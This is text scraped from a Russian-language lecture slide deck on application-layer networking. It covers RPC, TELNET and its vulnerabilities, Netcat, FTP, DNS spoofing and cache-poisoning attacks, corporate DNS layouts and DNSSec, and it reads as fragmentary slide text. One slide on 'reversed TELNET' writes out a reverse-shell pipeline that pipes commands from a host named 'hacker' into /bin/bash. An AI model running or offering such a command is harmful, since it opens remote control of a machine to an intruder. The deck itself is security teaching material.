Презентация "Прикладной уровень. DNS - 2" - скачать презентации по Информатике

Клиент

Сервер

Протокол обмена

TELNET
FTP
HTTP

Реализация служб прикладного уровня

Удалённый вызов процедур

Канальный
уровень

Физический
уровень

Сетевой
уровень

Транспортный
уровень

Уровень
соединения

Уровень
представления

Уровень
приложения

7

6

5

4

3

2

1

Ethernet, FDDI, X.25
и другие

Сетевой
уровень

IP

TCP,

Клиент

Сервер RPC

Протокол RPC

Спецификация RPC-сервера

Номер программы
Номер процедуры
Номер версии

Клиент

Сервер RPC

Запрос клиента

Спецификация RPC-сервера

Номер программы
Номер процедуры
Номер версии

Номер порта

Клиент

Сервер RPC

Номер процедуры

RPC-сканирование

Номер порта

Клиент
(утилита telnet)

Сервер
(telnetd)

Протокол обмена

TELNET

Протокол удалённого терминала - TELNET

Варианты взаимодействия
по протоколу TELNET

Терминал – Серверный процесс

Терминал – Терминал

Процесс – Процесс

Взаимодействие
«терминал-удалённый процесс»

Терминал – Серверный процесс

$a

a

a

a

Команды протокола TELNET

Управляющий символ IAC

Команда

Параметры

Interpret as Command, равен 255

Например, клавиша Backspace,

Команды протокола TELNET

Название команды

Код

Описание команды

IP (Interrupt Process)

244

Прерывание процесса
пользователя

AO (Abort Output)

Передача команд

$a

IAC EC

Backspace

$

Клиент
(утилита telnet)

Сервер
(telnetd)

Передача имени и пароля в открытом виде

Уязвимости протокола TELNET

Изменение переменных окружения до аутентификации

Уязвимости протокола TELNET

Клиент
(утилита telnet)

Сервер
(telnetd)

Что такое Netcat?

Netcat - это утилита, которая позволяет читать и записывать

Netcat и Telnet

Telnet имеет ограничения, преодолеть которые поможет Netcat. Например:
Ограничения стандартного

Режимы работы Netcat

Режим исходящих соединений

Режим ожидания входящих соединений

Слушающий порт

nc [-опции] <узел>

«Обращённый» TELNET

«Обращённый» TELNET

80

25

> telnet hacker 80

| /bin/bash | telnet hacker 25

/bin/bash

Команды

Результаты

Клиент

Сервер

Команды

Ответы

Реализация службы FTP

Интерфейс
пользователя

Модуль
управления
передачей

Модуль
передачи
данных

Данные

Модуль
управления
передачей

Модуль
передачи
данных

telnet www.microsoft.com

Resolver

www.microsoft.com - ?

100.0.0.6

DNS Server

DNS - служба

Домены и поддомены

« »

org

edu

com

company

sale

buhg

Root
Name
Server

company.com
Name Server

sale.company.com
Name Server

Записи Resource Record

main.sale.company.com. IN A 100.0.0.120

sale

sale.company.com
Name Server

sale.company.com. IN NS ns.sale.company.com

Разрешение имён

R
e
s
o
l
v
e
r

main.sale.company.com - ?

main.sale.company.com - ?

main.sale.company.com - ?

main.sale.company.com - ?

com Name

Применение транспортного протокола
без установления соединения (UDP)

Отсутствие идентификации и аутентификации

Отсутствие средств

Пример атаки на IP - сеть:
Атака на DNS

Нарушение нормального функционирования

Схема работы DNS - протокола

DNS-сервер

Хост А

IP - адрес

ID

Имя компьютера

SourcePort

DNS-запрос

DNS-ответ

ID

DNS-сервер

Хост А

ID

Имя компьютера

SourcePort

DNS-запрос

Хост А посылает DNS - запрос

Нарушитель должен находиться

DNS-сервер

Хост А

DNS-запрос

Нарушитель извлекает из запроса ID и SourcePort

Ложный DNS - ответ:
от

Хост А

Узел сети

Теперь путь пакета от хоста А до узла сети
будет

Пример атаки на IP - сеть:
Атака на DNS (вариант 2)

Нарушение

DNS-сервер

Хост А

ID

IP - адрес

DestPort

Ложные DNS - ответы

Перебор

Пример атаки на IP

DNS-сервер

Хост А

Ложные DNS - ответы

Пример атаки на IP - сеть:
Атака

Хост А

Узел сети

Теперь путь пакета от хоста А до узла сети
будет

DNS-сервер

193.233.70.129 ertr.mpei.ac.ru
.
.

Кэш - таблица

DNS-сервер
следующего уровня

DNS-запрос

DNS-ответ

194.154.77.109 www.infosec.ru

Пример атаки на IP - сеть:

DNS-сервер

193.233.70.129 ertr.mpei.ac.ru
.
.

Кэш - таблица

DNS-сервер
следующего уровня

DNS-запрос

194.154.77.123 www.infosec.ru

Ложные DNS - ответы

Пример атаки на

DNS-сервер

193.233.70.129 ertr.mpei.ac.ru
.
.

Кэш - таблица

194.154.77.123 www.infosec.ru

Хост А

194.154.77.123

www.infosec.ru

DNS-запрос

DNS-ответ

Пример атаки на IP - сеть:

DNS в корпоративной сети

Внешний узел

Вторичный
сервер

Внутренний
узел

Первичный
сервер

Репликация

Рекурсивный запрос

Рекурсивные
запросы

Итеративные
запросы

DNS

DNS

DNS в корпоративной сети

Доступ узлов корпоративной сети к полной
информации о

Двухсерверная конфигурация

Внешний узел

Вторичный
сервер

Внутренний
узел

Первичный
сервер
(минимальная
версия)

Репликация

Рекурсивный запрос

Рекурсивный
запрос

Итеративные
запросы

Межсетевой
экран

Первичный
сервер
(полная
версия)

DNS

DNS

DNS

Трехсерверная конфигурация

Внешний узел

Вторичный
сервер
(минимальная версия)

Внутренний
узел (с Internet)

Первичный
сервер
(минимальная
версия)

Репликация

Рекурсивный запрос

Рекурсивный
запрос

Итеративные
запросы

Межсетевой
экран

Первичный
сервер
(полная
версия+корень)

DNS

DNS

DNS

DNS

Вторичный
сервер
(полная
версия)

Внутренний
узел

Трёхсерверная конфигурация

Первичный
сервер
(минимальная
версия)

Межсетевой
экран

Первичный
сервер
(полная
версия)
+корень

DNS

DNS

DNS

Вторичный
сервер
(полная
версия)

Internet

Протокол DNSSec

Механизм распределения открытых ключей

Целостность и аутентичность информации DNS

Аутентификация транзакции

Новые записи Resource Record

main.sale.company.com. IN A 100.0.0.120

sale.company.com. IN NS ns.sale.company.com

sale.company.com. IN

Обычный DNS-запрос

qname=main.sale.company.com
qtype=A

main.sale.company.com A 100.0.0.120
Владелец
sale.company.com NS ns.sale.company.com
Дополнительно
ns.sale.company.com A 100.0.1.130

Запрос

Ответ

Запрос DNSSec

qname=main.sale.company.com
qtype=A

Вопрос
main.sale.company.com A ?
main.sale.company.com A 100.0.0.120
main.sale.company.com SIG [подпись]
Владелец
sale.company.com NS ns.sale.company.com
sale.company.com SIG